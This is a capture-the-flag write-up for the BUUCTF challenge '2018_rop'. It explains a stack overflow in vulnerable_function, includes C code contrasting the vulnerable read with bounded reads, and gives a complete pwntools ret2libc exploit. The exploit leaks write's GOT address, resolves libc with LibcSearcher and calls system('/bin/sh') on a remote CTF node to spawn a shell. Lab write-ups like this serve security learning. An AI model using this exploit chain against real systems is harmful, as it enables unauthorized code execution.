BUUCTF-PWN-铁人三项(第五赛区)_2018_rop

checksec


IDA


I am not sure what the be_nice_to_people function does, but this challenge does not seem to need it.

The vulnerable_function function contains a stack overflow.


So the approach for this challenge is to call write to leak a libc address and compute the addresses of system and the "/bin/sh" string from it.
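The bug the exploit relies on is the classic unbounded read into a fixed-size stack buffer. The C below is an added illustration and not the challenge binary's source: it places the vulnerable shape next to a bounded version so the fix is visible. The 0x88 buffer size matches the padding offset used in the exploit; the oversized request length and the helper names (vulnerable_shape, read_bounded, copy_bounded) are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Assumed layout, matching the offset the write-up uses: a 0x88-byte local
 * buffer, then the saved ebp (4 bytes), then the return address on a 32-bit
 * stack. The real vulnerable_function's read size is not known; the caller
 * of vulnerable_shape passes a hypothetical oversized length. */
#define BUF_SIZE 0x88

/* Vulnerable shape (hypothetical): the requested length is not tied to the
 * buffer size, so input past BUF_SIZE overwrites saved ebp and the return
 * address. Shown for contrast only; it is never called with live input here. */
ssize_t vulnerable_shape(int fd, size_t requested)
{
    char buf[BUF_SIZE];
    return read(fd, buf, requested);   /* requested > sizeof buf => overflow */
}

/* Hardened shape: the read is bounded by the buffer and one byte is reserved
 * for a terminating NUL, so no input length can reach the saved registers. */
ssize_t read_bounded(int fd, char *buf, size_t bufsz)
{
    if (bufsz == 0)
        return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Same bounds rule as read_bounded, but over an in-memory source so the
 * logic can be exercised without a file descriptor: copies at most dstsz-1
 * bytes, NUL-terminates, and returns the number of bytes accepted. */
size_t copy_bounded(char *dst, size_t dstsz, const char *src, size_t srclen)
{
    if (dstsz == 0)
        return 0;
    size_t n = srclen < dstsz - 1 ? srclen : dstsz - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

int main(void)
{
    char buf[BUF_SIZE];
    /* Constructed input: longer than the buffer plus saved ebp, i.e. the
     * length at which the write-up's payload starts overwriting the return
     * address. The bounded copy accepts only BUF_SIZE - 1 bytes of it. */
    char input[0x90];
    memset(input, 'a', sizeof input);
    size_t n = copy_bounded(buf, sizeof buf, input, sizeof input);
    printf("accepted %zu of %zu bytes\n", n, sizeof input);
    return 0;
}
```

The same bounds rule applies whether the data arrives via read, fgets, or a copy from another buffer: the limit must come from the destination's size, never from the input's length or a fixed constant chosen independently of the buffer.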

EXP

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

p = remote('node4.buuoj.cn', 29883)
# p = process('./2018_rop')
elf = ELF('./2018_rop')

# Static addresses from the binary (no PIE, so these are fixed).
main_addr = elf.sym['main']
print(hex(main_addr))
write_plt = elf.plt['write']
write_got = elf.got['write']

# Stage 1: overflow the 0x88-byte buffer plus the 4-byte saved ebp, then
# call write(1, write_got, 4) via the PLT. The return address after write
# is main, so the program loops back for a second input. In 32-bit cdecl
# the arguments sit on the stack right after the return address.
p.sendline(flat(b'a' * (0x88 + 0x4), p32(write_plt), p32(main_addr), p32(1), p32(write_got), p32(4)))
write_addr = u32(p.recv(4))
print(hex(write_addr))

# Identify the remote libc from the leaked write address and compute
# system and the "/bin/sh" string relative to the libc base.
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

# Stage 2: same overflow, this time calling system("/bin/sh"); the fake
# return address (main) is never used once the shell spawns.
# p.recvuntil('Hello, World\n')
p.sendline(flat(b'a' * (0x88 + 0x4), p32(system_addr), p32(main_addr), p32(binsh_addr)))

p.interactive()

Result


Trying the LibcSearcher candidates from the top: candidate 0 did not work, and candidate 1 did.
